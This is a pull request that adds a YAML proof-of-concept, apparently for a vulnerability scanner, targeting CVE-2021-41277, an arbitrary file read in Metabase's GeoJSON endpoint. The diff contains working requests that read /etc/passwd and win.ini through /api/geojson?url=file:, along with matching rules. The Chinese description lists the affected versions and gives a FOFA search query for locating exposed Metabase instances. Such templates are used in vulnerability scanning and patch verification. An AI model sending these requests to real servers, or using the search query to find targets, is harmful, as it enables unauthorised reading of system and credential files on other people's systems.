### PR TITLE
Create metabase-geojson-file-read.yml

### DIFF
--- a/pocs/metabase-geojson-file-read.yml
+++ b/pocs/metabase-geojson-file-read.yml
@@ -1,0 +1,22 @@
+name: poc-yaml-metabase-geojson-file-read
+manual: true
+transport: http
+rules:
+    linux0:
+        request:
+            cache: true
+            method: GET
+            path: /api/geojson?url=file:/etc/passwd
+            follow_redirects: false
+        expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+    windows0:
+        request:
+            cache: true
+            method: GET
+            path: /api/geojson?url=file:/windows/win.ini
+            follow_redirects: false
+        expression: response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
+expression: windows0() || linux0()
+detail:
+    author: AkBanner(https://github.com/AkBanner)
+    link: https://github.com/AkBanner


### PR DESCRIPTION
Metabase geojson 任意⽂件读取漏洞 CVE- 2021-41277
漏洞描述
在受影响的版本中，⾃定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）操作缺少权限验证，攻击者可通过该漏洞获得敏感信息

漏洞影响 
metabase version < 0.40.5 metabase version >= 1.0.0, < 1.40.5 

FOFA
app="metabase"